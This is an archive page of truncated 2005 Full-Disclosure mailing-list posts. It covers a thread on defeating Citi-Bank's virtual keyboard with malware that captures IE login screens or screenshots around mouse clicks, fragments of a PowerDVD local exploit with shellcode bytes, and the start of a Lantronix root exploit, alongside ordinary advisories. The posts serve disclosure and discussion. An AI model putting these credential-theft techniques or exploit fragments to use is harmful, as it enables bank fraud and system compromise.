Re: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread root
Aditya Deshmukh wrote: The only most secure protection is a one time password with a challenge / response scheme. Most of the banks in europe already do this. They give out a calculator like device to the customers and when u want to login you are presented with a challenge that you punch into

[Full-disclosure] RE: CAID 33239 - Computer Associates BrightStor ARCserve/Enterprise Backup Agents buffer overflow vulnerability

2005-08-05 Thread Williams, James K
On August 02, 2005, CA released patches to address a buffer overflow vulnerability in some of the BrightStor ARCserve Backup and BrightStor Enterprise Backup for Windows application agents. The patch for BrightStor ARCserve Backup r11.1 Agent for SQL for Windows (QO70767) did not fully remediate

RE: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread Aditya Deshmukh
The only most secure protection is a one time password with a challenge / response scheme. Most of the banks in europe already do this. They give out a calculator like device to the customers and when u want to login you are presented with a challenge that you punch into you device which spits a r

RE: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread Aditya Deshmukh
> > proximity of mouse cursor on every mouse click? It's not that > > resource consuming, and easy to arrange. > > You'd need to squeeze in some OCR code as well, or figure it out > manually (or maybe use the same techniques as for getting around > "captchas"). Another simple method capture the s

RE: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread fractalg
Hi, >As per my knowledge, there are no such keyloggers or spywares which uses any technique to defeat virtual keyboards. >However, the technique that I am going to discuss here can be used by malicious program writers to write next generation >viruses / worms to defeat such virtual keyboard prot

RE: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread Debasis Mohanty
Sweet and Simple - This is how this program works. A brief on the algo~m is given below - Step1: Enumerate all the IE windows and look for the one with CitiBank Login screen (This step is invoked when an IE is opened and a partucular URL is requested) Step2: If found then Create a HTML object

Re: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread root
Peter Ferrie wrote: Recently I discovered a method to defeat the much hyped Citi-Bank Virtual Keyboard Protection which the bank claimed that it defends the customers against malicious programs like keyloggers, Trojans and spywares etc. Wouldn't that be trivial to snoop on simply b

RE: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread Debasis Mohanty
MZ, >> What I proposed (and I'm sure I'm not innovative here) went along the lines of hooking up and intercepting the mouse >> click button, and then, at the exact moment of mouse click, capturing the position of the mouse pointer, and a bitmap >> of its nearest surroundings - ideally, before

[Full-disclosure] iDEFENSE Security Advisory 08.05.05: EMC Navisphere Manager Directory Traversal Vulnerability

2005-08-05 Thread iDEFENSE Labs
EMC Navisphere Manager Directory Traversal Vulnerability iDEFENSE Security Advisory 08.05.05 www.idefense.com/application/poi/display?id=288&type=vulnerabilities August 05, 2005 I. BACKGROUND EMC Navisphere storage management software is a suite of tools that enables discovery, monitoring, prov

Re: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread Michal Zalewski
On Fri, 5 Aug 2005, Jeremy Bishop wrote: > You'd need to squeeze in some OCR code as well, or figure it out > manually (or maybe use the same techniques as for getting around > "captchas"). Well, if carders can be bothered to review hours of recorded material from ATM-mounted cameras to grab PINs

RE: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread Michal Zalewski
On Sat, 6 Aug 2005, Debasis Mohanty wrote: > Read the description section again, perhaps you have missed out the > following - > . The Virtual Keyboard is dynamic > . The sequence in which the numbers appears will change every time, > the page is refreshed > > Hence, desiging something the

Re: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread Jeremy Bishop
On Friday 05 August 2005 13:10, Michal Zalewski wrote: > Wouldn't that be trivial to snoop on simply by making a trojan / > spyware application that records a section of screen in the immediate > proximity of mouse cursor on every mouse click? It's not that > resource consuming, and easy to arrange

RE: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread Debasis Mohanty
>> Wouldn't that be trivial to snoop on simply by making a trojan / spyware application that records a section of screen >> in the immediate proximity of mouse cursor on every mouse click? It's not that resource consuming, and easy to >> arrange. Read the description section again, perhaps you

Re: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread Peter Ferrie
>> Recently I discovered a method to defeat the much hyped Citi-Bank >> Virtual Keyboard Protection which the bank claimed that it defends the >> customers against malicious programs like keyloggers, Trojans and >> spywares etc. > >Wouldn't that be trivial to snoop on simply by making a trojan

Re: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread Michal Zalewski
On Sat, 6 Aug 2005, Debasis Mohanty wrote: > Recently I discovered a method to defeat the much hyped Citi-Bank > Virtual Keyboard Protection which the bank claimed that it defends the > customers against malicious programs like keyloggers, Trojans and > spywares etc. Wouldn't that be trivial to s

[Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread Debasis Mohanty
Recently I discovered a method to defeat the much hyped Citi-Bank Virtual Keyboard Protection which the bank claimed that it defends the customers against malicious programs like keyloggers, Trojans and spywares etc. Find the details below - Description: Early this year, Citi-Bank introduced th

Re: [Full-disclosure] PowerDVD <= 4.0 local exploit

2005-08-05 Thread Bernhard Mueller
edward GAGNON wrote: > int main(int argc, char *argv[]) > { > > char cmd[500]; > > [...] > > path = argv[1]; > > sprintf(cmd, "%s ", path); classical stack overflow ;) -- _ ~ DI (FH) Bernhard Mueller ~ IT Security Consultant ~ SEC-Cons

[Full-disclosure] PowerDVD <= 4.0 local exploit

2005-08-05 Thread edward GAGNON
#include #include #include int main(int argc, char *argv[]) { char cmd[500]; char *path; printf("\n\n* usage: pdvdx.exe \n\n"); if ( argc < 2 ) { printf(" need an argument!\n"); exit(0); } path = argv[1]; sprintf(cmd, "%s ", path); strcat(cmd, "\x44\x80\xC1\x77"); strcat(cmd, "\xDC\x7A\x

Re: [Full-disclosure] Weird URL

2005-08-05 Thread Roy
Bug Traq wrote: Paste this URL in a firefox browser address bar and see what happens. http://https/;//gmail.google.com Anyone know why? same thing happens when you just stick in 'https' at the address box. firefox probably shoots out a google query for 'https' right away... checkout google

Re: [Full-disclosure] Malicious Code Analysis

2005-08-05 Thread Willem Koenings
On 8/5/05, mike king <[EMAIL PROTECTED]> wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Thanks for all the feedback. I have always taken the poor mans > approach to this since its not really my job, but a fun hobby on > the side. for poor man's approach start with something easier l

[Full-disclosure] Root exploit in Lantonix Secure Console Server

2005-08-05 Thread c0ntex
/* * $ An open security advisory #11 - Lantronix SCS Local Root Exploits ***

Re: [Full-disclosure] Malicious Code Analysis

2005-08-05 Thread Willem Koenings
hi, > I'm now becoming very interested in learning more about malicious code > analysis in a virtual machine environment. I have read documentation > and set up the environment and tools etc.. However I have no malicious > code to look at! does anyone know of a way to get hold of some? > > Also,

Re: [Full-disclosure] Weird URL

2005-08-05 Thread Roy
Bug Traq wrote: Paste this URL in a firefox browser address bar and see what happens. http://https/;//gmail.google.com Anyone know why? same thing happens when you just stick in 'https' at the address box. firefox probably shoots out a google query for 'https' right away... checkout google

Re: [Full-disclosure] Mike Lynn's controvers

2005-08-05 Thread Anonymous
Someone asked for the video of Cisco riping shit out: http://42.pl/lynn/cisco.mov ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] "responsible disclosure" explanation

2005-08-05 Thread Georgi Guninski
here is what "responsible disclosure" means: according to: http://www.theregister.co.uk/2005/07/29/cisco_settles_rogue_researcher_dispute/ "Cisco's actions (regarding) Mr. Lynn and Black Hat were not based on the fact that a flaw was identified, rather that they chose to address the issue outsid

Re: [Full-disclosure] Fernando Gont remote command execution and big mouth vulnerability

2005-08-05 Thread Hugo Vazquez Carapez
> > If your bored, go and get a book. Belive me: it won't bite you. > Is that an attempt to be funny? JA. JA. JA. The only one that needs reading a book its you, I recomend for you "TCP IP Ilustrated" ... and learn how ICMP works > FYI, my website is http://www.gont.com.ar . > My site does not

[Full-disclosure] Re: Mozilla Firefox InstallVersion->compareTo() vulnerability lowered severity status

2005-08-05 Thread Aviv Raff
Hi SkyLined,   This is more than just a claim. I am using facts that were presented in the Bugzilla post by Shutdown, and were accepted by the Mozilla team. Combining those facts with your heap spraying method in mind, make this vulnerability a high risk that should be addressed as one in the advi

[Full-disclosure] [ GLSA 200508-04 ] Netpbm: Arbitrary code execution in pstopnm

2005-08-05 Thread Thierry Carrez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200508-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

RE: [Full-disclosure] Malicious Code Analysis

2005-08-05 Thread mike king
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Thanks for all the feedback. I have always taken the poor mans approach to this since its not really my job, but a fun hobby on the side. regards mike On Fri, 05 Aug 2005 02:49:49 -0700 Peter Kruse <[EMAIL PROTECTED]> wrote: >Hey, > >> These were not

RE: [Full-disclosure] Malicious Code Analysis

2005-08-05 Thread Peter Kruse
Hey, > These were not submitted to any AV vendors since Norton did flag them. > In the past I have submitted unknown trojans/ viruses like these to > Symantec when clients have been owned, but what can I say they are > hardly 0day more like 300 day. 8-) > http://www.bitsum.com/pec2.asp Yes,

RE: [Full-disclosure] Malicious Code Analysis

2005-08-05 Thread mike king
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Peter, Hello back. Hey thanks for the reply and not a flame. These were not submitted to any AV vendors since Norton did flag them. In the past I have submitted unknown trojans/ viruses like these to Symantec when clients have been owned, but what ca

RE: [Full-disclosure] Malicious Code Analysis

2005-08-05 Thread Peter Kruse
Hi Mike, I was just wondering if you have submitted these lastad samples to any antivirus vendors? Although this malware is already identified by several vendors, some don't detect any of these "lastad" variants posted on your website. A good way to ensure that samples gets added for detection, a

Re: [Full-disclosure] Malicious Code Analysis

2005-08-05 Thread Ty Bodell
I found it helpful to use the SoTM's from the Honeynet project that focused on Malicious code RCE. Try 32 & 33. Best thing is you get to see how other people went about doing it to. http://www.honeynet.org/scans/scan32/ http://www.honeynet.org/scans/scan33/ Goodluck, Ty On 8/4/05, M4ch3T3 Hax

Re: [Full-disclosure] Malicious Code Analysis

2005-08-05 Thread Dunceor .
Or just go to http://vx.netlux.org On 8/5/05, M4ch3T3 Hax <[EMAIL PROTECTED]> wrote: > Hello all, > > I have recently graduated from a computers & networking course at > university and have spent alot of my time analysing network security > from a scanning/sniffing/hardening point of view. > > I